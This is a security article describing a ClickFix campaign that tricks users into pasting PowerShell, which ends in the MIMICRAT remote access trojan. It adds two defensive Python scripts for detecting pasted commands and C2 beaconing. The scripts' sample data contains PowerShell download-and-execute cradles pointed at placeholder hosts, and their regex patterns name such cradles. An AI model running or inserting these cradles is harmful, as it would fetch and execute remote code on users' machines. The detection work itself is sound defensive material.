bincheck.io page source | Elastic Security Labs
Security researchers are sounding the alarm over a malware campaign that weaponizes users' willingness to follow on-screen instructions in order to bypass traditional security controls. According to a recent investigation by Elastic Security Labs, a widespread “ClickFix” campaign is actively compromising legitimate websites to deliver a previously undocumented and highly capable custom Remote Access Trojan (RAT) dubbed MIMICRAT.
Unlike many modern cyberattacks that rely on brute force or unpatched software vulnerabilities, this campaign relies entirely on social engineering, tricking users into manually executing the malware themselves.
The campaign's camouflage is its delivery infrastructure. The attackers are not using easily identifiable, newly registered malicious domains. Instead, the report notes that “The campaign’s delivery relies entirely on compromising legitimate, trusted websites rather than attacker-owned infrastructure”.
The attack flow typically begins when a user visits a trusted site, such as a BIN (bank identification number) lookup service identified by researchers as bincheck[.]io. That site was itself compromised to load a malicious script from a second compromised site, an Indian mutual fund platform, so neither hostname in the delivery chain belongs to the attacker.
This script presents the user with a highly convincing, dynamically localized fake Cloudflare “verification” page. Instead of asking the user to solve a CAPTCHA puzzle, the page instructs them to press Win+R (opening the Windows Run dialog) and paste a command to “fix” a connection issue or prove they are human.
“The lure copies a malicious PowerShell command directly to the victim’s clipboard and prompts them to open a Run dialog (Win+R) or PowerShell prompt and paste it,” the researchers explain. Because the user manually executes the command, “This technique bypasses browser-based download protections entirely, as no file is downloaded”.
Once the victim executes the clipboard command, a five-stage attack chain follows:
- The Obfuscated Downloader: The initial command is an obfuscated PowerShell one-liner that connects to the attacker’s command-and-control (C2) server and retrieves a larger second-stage script.
- Blinding the Defenses: The second-stage PowerShell script neutralizes the host’s built-in telemetry and scanning hooks. It patches Event Tracing for Windows (ETW) in memory so the process stops emitting trace events, and patches the Anti-Malware Scan Interface (AMSI) in memory so the script content that follows is never handed to the installed antivirus for scanning.
- The Lua Loader: With defenses down, a custom Lua 5.4.7 loader is dropped and executed.
- Fileless Shellcode: The Lua loader decrypts embedded shellcode entirely in memory, avoiding writing malicious executables to the hard drive where they might be discovered.
- MIMICRAT Execution: The shellcode reflectively loads the final payload: MIMICRAT.
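The lure described above and the first stage of the chain leave two traces on the endpoint that are worth triaging: a PowerShell host spawned by explorer.exe (what a command pasted into the Win+R dialog looks like in process-creation telemetry such as Sysmon event 1), and the Run dialog's own history in the RunMRU registry key, which stores the typed text and survives a reboot. The following Python script is an added example, not code from Elastic's report or from the campaign. It assumes Sysmon-style field names (ParentImage, Image, CommandLine), the sample events and RunMRU entries are constructed, every hostname is a placeholder, and the indicator list is this example's own heuristic rather than an IOC published by the researchers.

```python
"""Triage ClickFix-style executions from process-creation telemetry and the Run-dialog
history. Heuristics are this example's own; they are not Elastic's detection logic."""
import re

# Indicators typical of a clipboard-pasted PowerShell cradle. Each is a generic
# ClickFix tell and an assumption of this example, not an IOC from the report.
INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "no_profile":      re.compile(r"-nop(?:rofile)?\b", re.I),
    "bypass_policy":   re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "invoke_expr":     re.compile(r"\biex\b|invoke-expression", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|irm)\b|invoke-webrequest|invoke-restmethod|"
                                  r"downloadstring|net\.webclient", re.I),
    "lure_comment":    re.compile(r"not a robot|verification id|captcha", re.I),
}
RUN_DIALOG_PARENTS = {"explorer.exe"}   # Win+R launches its command as a child of explorer.exe
SHELLS = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_command(text: str) -> list[str]:
    """Names of the indicators found in a command line or script block."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def is_clickfix_execution(event: dict, min_hits: int = 2) -> tuple[bool, list[str]]:
    """True when a PowerShell host carrying >= min_hits indicators was spawned by
    explorer.exe, i.e. the shape of a command pasted into the Run dialog."""
    hits = score_command(event.get("CommandLine", ""))
    launched_from_run = (basename(event.get("ParentImage", "")) in RUN_DIALOG_PARENTS
                         and basename(event.get("Image", "")) in SHELLS)
    return (launched_from_run and len(hits) >= min_hits), hits


def triage(events: list[dict]) -> list[dict]:
    return [e for e in events if is_clickfix_execution(e)[0]]


def suspicious_runmru(values: dict) -> list[str]:
    """Run-dialog history entries matching the cradle pattern, most recent first.
    Explorer stores each entry as '<command>\\1' under a one-letter value name beneath
    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU and keeps the
    order in MRUList, so the pasted text is recoverable even without process telemetry."""
    flagged = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        if len(score_command(cmd)) >= 2:
            flagged.append(cmd)
    return flagged


# Constructed sample telemetry in Sysmon-event-1-like fields; hostnames are placeholders.
SAMPLE_EVENTS = [
    # Win+R -> obfuscated download cradle: the ClickFix pattern.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -nop -ep bypass -c "iex (iwr http://example.invalid/s)"'},
    # Admin running a script from a terminal: one weak hit, wrong parent.
    {"ParentImage": r"C:\Windows\System32\WindowsTerminal.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\backup.ps1"},
    # Run dialog used for something harmless.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    # Win+R -> encoded command in PowerShell 7.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -nop -w hidden -enc SQBFAFgAIAAoAEkAVwBSACAAaAB0AHQAcAA6AC8ALwBlAHgA"},
    # Run dialog used just to open an interactive shell: no indicators.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},
]
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": 'powershell -w hidden -c "iex (iwr http://example.invalid/s)" # I am not a robot\\1',
}

if __name__ == "__main__":
    for e in triage(SAMPLE_EVENTS):
        print("ClickFix execution:", e["CommandLine"], is_clickfix_execution(e)[1])
    print("RunMRU hits:", suspicious_runmru(SAMPLE_RUNMRU))
```

The parent-process check covers the Win+R path only. If the victim pastes the command into an already open PowerShell prompt, no new process is created and the cradle appears only in PowerShell script block logging (event 4104), where the same score_command indicators can be applied to the logged script text. Note also that because stage two patches ETW and AMSI in memory, telemetry from the second stage onward cannot be relied on; the process-creation event and the RunMRU entry are written before those patches land, which is what makes them useful.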
The deployment of MIMICRAT represents a significant escalation in ClickFix campaigns, which typically deliver simpler, off-the-shelf information stealers.
Elastic Security Labs notes that “Unlike simpler ClickFix deployments that terminate at commodity infostealers, this campaign ends with a capable custom remote access trojan (RAT) we have called MIMICRAT: a native C implant with malleable C2 profiles, token impersonation, SOCKS5 tunneling, and a 22-command dispatch table”.
MIMICRAT is built for long-term access and control. It talks to its operators over HTTPS on port 443, using malleable profiles that shape its requests to resemble benign web analytics traffic so that they blend into ordinary browsing in network logs. Its 22-command dispatch table lets operators steal files, enumerate and manipulate running processes, open interactive command shells, impersonate tokens, and route further traffic through the infected host via its SOCKS5 proxy.
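A C2 profile that mimics web analytics can copy the URL shape and User-Agent of real tracking calls, but an implant still checks in on a timer, whereas genuine analytics traffic clusters around page loads. The following Python script is an added example of beacon-interval analysis over web-proxy records, a generic network-monitoring technique rather than a detection published by Elastic Security Labs. The proxy log is constructed, every hostname is a placeholder, the record format (timestamp, source, destination, port, path, status) is this example's own, and the thresholds (at least six connections, coefficient of variation of the gaps at most 0.2) are assumptions to be tuned per environment.

```python
"""Beacon-interval analysis: flag (src, dst, port) pairs whose inter-arrival gaps are
regular enough to be a sleep timer with jitter. Generic technique, not Elastic's logic."""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log (timestamp src dst port path status). Both analytics-looking hosts
# use the same request shape; only their timing differs. All hostnames are placeholders.
SAMPLE_PROXY_LOG = """\
2024-05-01T10:00:00Z 10.0.0.5 cdn-metrics.example.invalid 443 /collect?v=1&tid=UA-1 200
2024-05-01T10:00:00Z 10.0.0.7 analytics.example.invalid 443 /collect?v=1&tid=UA-2 200
2024-05-01T10:00:03Z 10.0.0.7 analytics.example.invalid 443 /collect?v=1&tid=UA-2 200
2024-05-01T10:00:05Z 10.0.0.7 analytics.example.invalid 443 /collect?v=1&tid=UA-2 200
2024-05-01T10:00:30Z 10.0.0.9 updates.example.invalid 443 /check 200
2024-05-01T10:01:01Z 10.0.0.5 cdn-metrics.example.invalid 443 /collect?v=1&tid=UA-1 200
2024-05-01T10:01:59Z 10.0.0.5 cdn-metrics.example.invalid 443 /collect?v=1&tid=UA-1 200
2024-05-01T10:02:10Z 10.0.0.7 analytics.example.invalid 443 /collect?v=1&tid=UA-2 200
2024-05-01T10:02:11Z 10.0.0.7 analytics.example.invalid 443 /collect?v=1&tid=UA-2 200
2024-05-01T10:02:14Z 10.0.0.7 analytics.example.invalid 443 /collect?v=1&tid=UA-2 200
2024-05-01T10:03:01Z 10.0.0.5 cdn-metrics.example.invalid 443 /collect?v=1&tid=UA-1 200
2024-05-01T10:04:00Z 10.0.0.5 cdn-metrics.example.invalid 443 /collect?v=1&tid=UA-1 200
2024-05-01T10:04:59Z 10.0.0.5 cdn-metrics.example.invalid 443 /collect?v=1&tid=UA-1 200
2024-05-01T10:06:01Z 10.0.0.5 cdn-metrics.example.invalid 443 /collect?v=1&tid=UA-1 200
2024-05-01T10:07:00Z 10.0.0.5 cdn-metrics.example.invalid 443 /collect?v=1&tid=UA-1 200
2024-05-01T10:10:00Z 10.0.0.7 analytics.example.invalid 443 /collect?v=1&tid=UA-2 200
2024-05-01T10:10:02Z 10.0.0.7 analytics.example.invalid 443 /collect?v=1&tid=UA-2 200
2024-05-01T10:30:30Z 10.0.0.9 updates.example.invalid 443 /check 200
""".splitlines()


def parse_line(line: str):
    ts, src, dst, port, path, _status = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst, int(port), path


def interval_stats(lines, min_connections: int = 6) -> dict:
    """Per (src, dst, port): connection count, mean inter-arrival gap in seconds, and the
    coefficient of variation (stdev / mean) of the gaps. Sparse pairs are skipped."""
    by_pair = defaultdict(list)
    for line in lines:
        ts, src, dst, port, _ = parse_line(line)
        by_pair[(src, dst, port)].append(ts)
    stats = {}
    for pair, times in by_pair.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        stats[pair] = {"connections": len(times), "mean_gap": mean, "cv": round(cv, 3)}
    return stats


def beacon_candidates(lines, min_connections: int = 6, max_cv: float = 0.2) -> dict:
    """Pairs whose gaps are regular enough to look like a timer plus jitter."""
    return {pair: s for pair, s in interval_stats(lines, min_connections).items()
            if s["cv"] <= max_cv}


if __name__ == "__main__":
    for pair, s in interval_stats(SAMPLE_PROXY_LOG).items():
        print(pair, s)
    print("beacon candidates:", list(beacon_candidates(SAMPLE_PROXY_LOG)))
```

In the sample the two analytics-looking hosts are indistinguishable by request content, yet the 10.0.0.5 pair checks in roughly every 60 seconds with a coefficient of variation near 0.03, while the page-load-driven pair scores well above 1. Operators can widen the sleep jitter to push the score up, so in practice this signal is combined with others the profile does not control, such as the regularity of response sizes and a host pair that was never seen before the incident window.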
Because this campaign tricks the user rather than exploiting software, and because every hostname in the delivery chain is a legitimate site and nothing is downloaded as a file, controls that key on newly registered domains or on file downloads see nothing. Security teams are strongly urged to educate employees about the ClickFix methodology, specifically that no legitimate website will ever ask a user to open the Windows Run dialog or a PowerShell prompt to verify their identity or prove they are human. On the endpoint, process-creation logging (a PowerShell host spawned by explorer.exe is the signature of a command pasted into Win+R) and PowerShell script block logging give defenders a record of the pasted command even though it never touches disk as a file.